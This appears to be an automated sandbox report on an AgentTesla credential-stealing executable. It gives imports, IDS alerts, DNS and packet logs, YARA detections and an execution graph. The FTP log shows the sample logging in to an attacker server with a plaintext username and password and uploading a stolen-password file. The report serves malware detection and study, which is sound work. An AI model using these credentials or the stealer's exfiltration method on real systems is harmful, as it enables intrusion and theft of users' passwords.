                    RT_MENU0xce4a00x50dataEnglishGreat Britain0.9
                    RT_STRING0xce4f00x594dataEnglishGreat Britain0.3333333333333333
                    RT_STRING0xcea840x68adataEnglishGreat Britain0.2747909199522103
                    RT_STRING0xcf1100x490dataEnglishGreat Britain0.3715753424657534
                    RT_STRING0xcf5a00x5fcdataEnglishGreat Britain0.3087467362924282
                    RT_STRING0xcfb9c0x65cdataEnglishGreat Britain0.34336609336609336
                    RT_STRING0xd01f80x466dataEnglishGreat Britain0.3605683836589698
                    RT_STRING0xd06600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                    RT_RCDATA0xd07b80x2b908data1.0003418516027796
                    RT_GROUP_ICON0xfc0c00x76dataEnglishGreat Britain0.6610169491525424
                    RT_GROUP_ICON0xfc1380x14dataEnglishGreat Britain1.25
                    RT_GROUP_ICON0xfc14c0x14dataEnglishGreat Britain1.15
                    RT_GROUP_ICON0xfc1600x14dataEnglishGreat Britain1.25
                    RT_VERSION0xfc1740x10cdataEnglishGreat Britain0.5970149253731343
                    RT_MANIFEST0xfc2800x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                    DLLImport
                    WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                    VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                    MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                    WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                    PSAPI.DLLGetProcessMemoryInfo
                    IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                    USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                    UxTheme.dllIsThemeActive
                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                    USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                    GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                    COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                    ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                    SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                    OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                    Language of compilation systemCountry where language is spokenMap
                    EnglishGreat Britain
                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    05/24/24-11:18:15.551341TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity4973147566192.168.2.4201.148.105.186
                    05/24/24-11:18:14.933252TCP2029927ET TROJAN AgentTesla Exfil via FTP4973021192.168.2.4201.148.105.186
                    05/24/24-11:18:15.551341TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil4973147566192.168.2.4201.148.105.186
                    TimestampSource PortDest PortSource IPDest IP
                    May 24, 2024 11:18:12.791018009 CEST4973021192.168.2.4201.148.105.186
                    May 24, 2024 11:18:12.796294928 CEST2149730201.148.105.186192.168.2.4
                    May 24, 2024 11:18:12.796406031 CEST4973021192.168.2.4201.148.105.186
                    May 24, 2024 11:18:13.420198917 CEST2149730201.148.105.186192.168.2.4
                    May 24, 2024 11:18:13.420727015 CEST4973021192.168.2.4201.148.105.186
                    May 24, 2024 11:18:13.425828934 CEST2149730201.148.105.186192.168.2.4
                    May 24, 2024 11:18:13.643019915 CEST2149730201.148.105.186192.168.2.4
                    May 24, 2024 11:18:13.645137072 CEST4973021192.168.2.4201.148.105.186
                    May 24, 2024 11:18:13.650100946 CEST2149730201.148.105.186192.168.2.4
                    May 24, 2024 11:18:14.011776924 CEST2149730201.148.105.186192.168.2.4
                    May 24, 2024 11:18:14.012034893 CEST4973021192.168.2.4201.148.105.186
                    May 24, 2024 11:18:14.017210960 CEST2149730201.148.105.186192.168.2.4
                    May 24, 2024 11:18:14.234715939 CEST2149730201.148.105.186192.168.2.4
                    May 24, 2024 11:18:14.235887051 CEST4973021192.168.2.4201.148.105.186
                    May 24, 2024 11:18:14.240859985 CEST2149730201.148.105.186192.168.2.4
                    May 24, 2024 11:18:14.460078001 CEST2149730201.148.105.186192.168.2.4
                    May 24, 2024 11:18:14.467338085 CEST4973021192.168.2.4201.148.105.186
                    May 24, 2024 11:18:14.472254038 CEST2149730201.148.105.186192.168.2.4
                    May 24, 2024 11:18:14.694156885 CEST2149730201.148.105.186192.168.2.4
                    May 24, 2024 11:18:14.694459915 CEST4973021192.168.2.4201.148.105.186
                    May 24, 2024 11:18:14.699330091 CEST2149730201.148.105.186192.168.2.4
                    May 24, 2024 11:18:14.927403927 CEST2149730201.148.105.186192.168.2.4
                    May 24, 2024 11:18:14.928055048 CEST4973147566192.168.2.4201.148.105.186
                    May 24, 2024 11:18:14.933012962 CEST4756649731201.148.105.186192.168.2.4
                    May 24, 2024 11:18:14.933100939 CEST4973147566192.168.2.4201.148.105.186
                    May 24, 2024 11:18:14.933252096 CEST4973021192.168.2.4201.148.105.186
                    May 24, 2024 11:18:14.984253883 CEST2149730201.148.105.186192.168.2.4
                    May 24, 2024 11:18:15.551079988 CEST2149730201.148.105.186192.168.2.4
                    May 24, 2024 11:18:15.551341057 CEST4973147566192.168.2.4201.148.105.186
                    May 24, 2024 11:18:15.551428080 CEST4973147566192.168.2.4201.148.105.186
                    May 24, 2024 11:18:15.556368113 CEST4756649731201.148.105.186192.168.2.4
                    May 24, 2024 11:18:15.561672926 CEST4756649731201.148.105.186192.168.2.4
                    May 24, 2024 11:18:15.561748028 CEST4973147566192.168.2.4201.148.105.186
                    May 24, 2024 11:18:15.597860098 CEST4973021192.168.2.4201.148.105.186
                    May 24, 2024 11:18:15.778122902 CEST2149730201.148.105.186192.168.2.4
                    May 24, 2024 11:18:15.832304955 CEST4973021192.168.2.4201.148.105.186
                    TimestampSource PortDest PortSource IPDest IP
                    May 24, 2024 11:18:12.413028955 CEST5214753192.168.2.41.1.1.1
                    May 24, 2024 11:18:12.786117077 CEST53521471.1.1.1192.168.2.4
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    May 24, 2024 11:18:12.413028955 CEST192.168.2.41.1.1.10x7a3bStandard query (0)ftp.transotraval.clA (IP address)IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    May 24, 2024 11:18:12.786117077 CEST1.1.1.1192.168.2.40x7a3bNo error (0)ftp.transotraval.cl201.148.105.186A (IP address)IN (0x0001)false
                    TimestampSource PortDest PortSource IPDest IPCommands
                    May 24, 2024 11:18:13.420198917 CEST2149730201.148.105.186192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.
                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 05:18. Server port: 21.
                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 05:18. Server port: 21.220-This is a private system - No anonymous login
                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 05:18. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 05:18. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                    May 24, 2024 11:18:13.420727015 CEST4973021192.168.2.4201.148.105.186USER ugoomabless@transotraval.cl
                    May 24, 2024 11:18:13.643019915 CEST2149730201.148.105.186192.168.2.4331 User ugoomabless@transotraval.cl OK. Password required
                    May 24, 2024 11:18:13.645137072 CEST4973021192.168.2.4201.148.105.186PASS 4)7@D4,-Q%Xj
                    May 24, 2024 11:18:14.011776924 CEST2149730201.148.105.186192.168.2.4230 OK. Current restricted directory is /
                    May 24, 2024 11:18:14.234715939 CEST2149730201.148.105.186192.168.2.4504 Unknown command
                    May 24, 2024 11:18:14.235887051 CEST4973021192.168.2.4201.148.105.186PWD
                    May 24, 2024 11:18:14.460078001 CEST2149730201.148.105.186192.168.2.4257 "/" is your current location
                    May 24, 2024 11:18:14.467338085 CEST4973021192.168.2.4201.148.105.186TYPE I
                    May 24, 2024 11:18:14.694156885 CEST2149730201.148.105.186192.168.2.4200 TYPE is now 8-bit binary
                    May 24, 2024 11:18:14.694459915 CEST4973021192.168.2.4201.148.105.186PASV
                    May 24, 2024 11:18:14.927403927 CEST2149730201.148.105.186192.168.2.4227 Entering Passive Mode (201,148,105,186,185,206)
                    May 24, 2024 11:18:14.933252096 CEST4973021192.168.2.4201.148.105.186STOR PW_user-887849_2024_05_24_05_18_11.html
                    May 24, 2024 11:18:15.551079988 CEST2149730201.148.105.186192.168.2.4150 Accepted data connection
                    May 24, 2024 11:18:15.778122902 CEST2149730201.148.105.186192.168.2.4226-File successfully transferred
                    226-File successfully transferred226 0.227 seconds (measured here), 1.37 Kbytes per second

                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:05:18:08
                    Start date:24/05/2024
                    Path:C:\Users\user\Desktop\7F7R8soxHM.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\7F7R8soxHM.exe"
                    Imagebase:0xe70000
                    File size:1'043'968 bytes
                    MD5 hash:8F537E91245BCC1510A9867CB88B12EA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                    Reputation:low
                    Has exited:true

                    Target ID:1
                    Start time:05:18:09
                    Start date:24/05/2024
                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\7F7R8soxHM.exe"
                    Imagebase:0x7a0000
                    File size:45'984 bytes
                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.2883490395.000000000295E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2882256622.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.2882256622.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2883490395.0000000002911000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.2883490395.0000000002911000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:high
                    Has exited:false

                    Reset < >

                      Execution Graph

                      Execution Coverage:4%
                      Dynamic/Decrypted Code Coverage:1.5%
                      Signature Coverage:5.8%
                      Total number of Nodes:2000
                      Total number of Limit Nodes:154
                      execution_graph 97197 e71066 97202 e7f8cf 97197->97202 97199 e7106c 97235 e92f80 97199->97235 97203 e7f8f0 97202->97203 97238 e90143 97203->97238 97207 e7f937 97248 e777c7 97207->97248 97210 e777c7 59 API calls 97211 e7f94b 97210->97211 97212 e777c7 59 API calls 97211->97212 97213 e7f955 97212->97213 97214 e777c7 59 API calls 97213->97214 97215 e7f993 97214->97215 97216 e777c7 59 API calls 97215->97216 97217 e7fa5e 97216->97217 97253 e860e7 97217->97253 97221 e7fa90 97222 e777c7 59 API calls 97221->97222 97223 e7fa9a 97222->97223 97281 e8ffde 97223->97281 97225 e7fae1 97226 e7faf1 GetStdHandle 97225->97226 97227 e7fb3d 97226->97227 97228 eb49d5 97226->97228 97229 e7fb45 OleInitialize 97227->97229 97228->97227 97230 eb49de 97228->97230 97229->97199 97288 ed6dda 64 API calls Mailbox 97230->97288 97232 eb49e5 97289 ed74a9 CreateThread 97232->97289 97234 eb49f1 CloseHandle 97234->97229 97361 e92e84 97235->97361 97237 e71076 97290 e9021c 97238->97290 97241 e9021c 59 API calls 97242 e90185 97241->97242 97243 e777c7 59 API calls 97242->97243 97244 e90191 97243->97244 97297 e77d2c 97244->97297 97246 e7f8f6 97247 e903a2 6 API calls 97246->97247 97247->97207 97249 e90ff6 Mailbox 59 API calls 97248->97249 97250 e777e8 97249->97250 97251 e90ff6 Mailbox 59 API calls 97250->97251 97252 e777f6 97251->97252 97252->97210 97254 e777c7 59 API calls 97253->97254 97255 e860f7 97254->97255 97256 e777c7 59 API calls 97255->97256 97257 e860ff 97256->97257 97356 e85bfd 97257->97356 97260 e85bfd 59 API calls 97261 e8610f 97260->97261 97262 e777c7 59 API calls 97261->97262 97263 e8611a 97262->97263 97264 e90ff6 Mailbox 59 API calls 97263->97264 97265 e7fa68 97264->97265 97266 e86259 97265->97266 97267 e86267 97266->97267 97268 e777c7 59 API calls 97267->97268 97269 e86272 97268->97269 97270 e777c7 59 API calls 97269->97270 97271 e8627d 97270->97271 97272 e777c7 59 API calls 97271->97272 97273 e86288 97272->97273 97274 e777c7 59 API calls 97273->97274 97275 e86293 97274->97275 97276 e85bfd 59 API calls 97275->97276 97277 e8629e 97276->97277 97278 e90ff6 Mailbox 59 API calls 97277->97278 97279 e862a5 RegisterWindowMessageW 97278->97279 97279->97221 97282 e8ffee 97281->97282 97283 ec5cc3 97281->97283 97284 e90ff6 Mailbox 59 API calls 97282->97284 97359 ed9d71 60 API calls 97283->97359 97287 e8fff6 97284->97287 97286 ec5cce 97287->97225 97288->97232 97289->97234 97360 ed748f 65 API calls 97289->97360 97291 e777c7 59 API calls 97290->97291 97292 e90227 97291->97292 97293 e777c7 59 API calls 97292->97293 97294 e9022f 97293->97294 97295 e777c7 59 API calls 97294->97295 97296 e9017b 97295->97296 97296->97241 97298 e77da5 97297->97298 97299 e77d38 __NMSG_WRITE 97297->97299 97310 e77e8c 97298->97310 97301 e77d73 97299->97301 97302 e77d4e 97299->97302 97307 e78189 97301->97307 97306 e78087 59 API calls Mailbox 97302->97306 97305 e77d56 _memmove 97305->97246 97306->97305 97314 e90ff6 97307->97314 97309 e78193 97309->97305 97311 e77e9a 97310->97311 97313 e77ea3 _memmove 97310->97313 97311->97313 97352 e77faf 97311->97352 97313->97305 97317 e90ffe 97314->97317 97316 e91018 97316->97309 97317->97316 97319 e9101c std::exception::exception 97317->97319 97324 e9594c 97317->97324 97341 e935e1 DecodePointer 97317->97341 97342 e987db RaiseException 97319->97342 97321 e91046 97343 e98711 58 API calls _free 97321->97343 97323 e91058 97323->97309 97325 e959c7 97324->97325 97338 e95958 97324->97338 97350 e935e1 DecodePointer 97325->97350 97327 e95963 97327->97338 97344 e9a3ab 58 API calls __NMSG_WRITE 97327->97344 97345 e9a408 58 API calls 6 library calls 97327->97345 97346 e932df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97327->97346 97328 e959cd 97351 e98d68 58 API calls __getptd_noexit 97328->97351 97331 e9598b RtlAllocateHeap 97332 e959bf 97331->97332 97331->97338 97332->97317 97334 e959b3 97348 e98d68 58 API calls __getptd_noexit 97334->97348 97338->97327 97338->97331 97338->97334 97339 e959b1 97338->97339 97347 e935e1 DecodePointer 97338->97347 97349 e98d68 58 API calls __getptd_noexit 97339->97349 97341->97317 97342->97321 97343->97323 97344->97327 97345->97327 97347->97338 97348->97339 97349->97332 97350->97328 97351->97332 97353 e77fc2 97352->97353 97355 e77fbf _memmove 97352->97355 97354 e90ff6 Mailbox 59 API calls 97353->97354 97354->97355 97355->97313 97357 e777c7 59 API calls 97356->97357 97358 e85c05 97357->97358 97358->97260 97359->97286 97362 e92e90 __ioinit 97361->97362 97369 e93457 97362->97369 97368 e92eb7 __ioinit 97368->97237 97386 e99e4b 97369->97386 97371 e92e99 97372 e92ec8 DecodePointer DecodePointer 97371->97372 97373 e92ef5 97372->97373 97374 e92ea5 97372->97374 97373->97374 97432 e989e4 59 API calls __wopenfile 97373->97432 97383 e92ec2 97374->97383 97376 e92f58 EncodePointer EncodePointer 97376->97374 97377 e92f2c 97377->97374 97381 e92f46 EncodePointer 97377->97381 97434 e98aa4 61 API calls 2 library calls 97377->97434 97378 e92f07 97378->97376 97378->97377 97433 e98aa4 61 API calls 2 library calls 97378->97433 97381->97376 97382 e92f40 97382->97374 97382->97381 97435 e93460 97383->97435 97387 e99e5c 97386->97387 97388 e99e6f EnterCriticalSection 97386->97388 97393 e99ed3 97387->97393 97388->97371 97390 e99e62 97390->97388 97417 e932f5 58 API calls 3 library calls 97390->97417 97394 e99edf __ioinit 97393->97394 97395 e99ee8 97394->97395 97396 e99f00 97394->97396 97418 e9a3ab 58 API calls __NMSG_WRITE 97395->97418 97399 e99f21 __ioinit 97396->97399 97421 e98a5d 58 API calls 2 library calls 97396->97421 97399->97390 97400 e99eed 97419 e9a408 58 API calls 6 library calls 97400->97419 97401 e99f15 97404 e99f2b 97401->97404 97405 e99f1c 97401->97405 97403 e99ef4 97420 e932df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97403->97420 97408 e99e4b __lock 58 API calls 97404->97408 97422 e98d68 58 API calls __getptd_noexit 97405->97422 97410 e99f32 97408->97410 97411 e99f3f 97410->97411 97412 e99f57 97410->97412 97423 e9a06b InitializeCriticalSectionAndSpinCount 97411->97423 97424 e92f95 97412->97424 97415 e99f4b 97430 e99f73 LeaveCriticalSection _doexit 97415->97430 97418->97400 97419->97403 97421->97401 97422->97399 97423->97415 97425 e92fc7 __dosmaperr 97424->97425 97426 e92f9e RtlFreeHeap 97424->97426 97425->97415 97426->97425 97427 e92fb3 97426->97427 97431 e98d68 58 API calls __getptd_noexit 97427->97431 97429 e92fb9 GetLastError 97429->97425 97430->97399 97431->97429 97432->97378 97433->97377 97434->97382 97438 e99fb5 LeaveCriticalSection 97435->97438 97437 e92ec7 97437->97368 97438->97437 97439 e71016 97444 e74ad2 97439->97444 97442 e92f80 __cinit 67 API calls 97443 e71025 97442->97443 97445 e90ff6 Mailbox 59 API calls 97444->97445 97446 e74ada 97445->97446 97447 e7101b 97446->97447 97451 e74a94 97446->97451 97447->97442 97452 e74aaf 97451->97452 97453 e74a9d 97451->97453 97455 e74afe 97452->97455 97454 e92f80 __cinit 67 API calls 97453->97454 97454->97452 97456 e777c7 59 API calls 97455->97456 97457 e74b16 GetVersionExW 97456->97457 97458 e77d2c 59 API calls 97457->97458 97459 e74b59 97458->97459 97460 e77e8c 59 API calls 97459->97460 97463 e74b86 97459->97463 97461 e74b7a 97460->97461 97483 e77886 97461->97483 97464 e74bf1 GetCurrentProcess IsWow64Process 97463->97464 97468 eadc8d 97463->97468 97465 e74c0a 97464->97465 97466 e74c20 97465->97466 97467 e74c89 GetSystemInfo 97465->97467 97479 e74c95 97466->97479 97469 e74c56 97467->97469 97469->97447 97472 e74c32 97474 e74c95 2 API calls 97472->97474 97473 e74c7d GetSystemInfo 97475 e74c47 97473->97475 97476 e74c3a GetNativeSystemInfo 97474->97476 97475->97469 97477 e74c4d FreeLibrary 97475->97477 97476->97475 97477->97469 97480 e74c2e 97479->97480 97481 e74c9e LoadLibraryA 97479->97481 97480->97472 97480->97473 97481->97480 97482 e74caf GetProcAddress 97481->97482 97482->97480 97484 e77894 97483->97484 97485 e77e8c 59 API calls 97484->97485 97486 e778a4 97485->97486 97486->97463 97487 1712410 97501 1710000 97487->97501 97489 171250d 97504 1712300 97489->97504 97507 1713540 GetPEB 97501->97507 97503 171068b 97503->97489 97505 1712309 Sleep 97504->97505 97506 1712317 97505->97506 97508 171356a 97507->97508 97508->97503 97509 e71055 97514 e72649 97509->97514 97512 e92f80 __cinit 67 API calls 97513 e71064 97512->97513 97515 e777c7 59 API calls 97514->97515 97516 e726b7 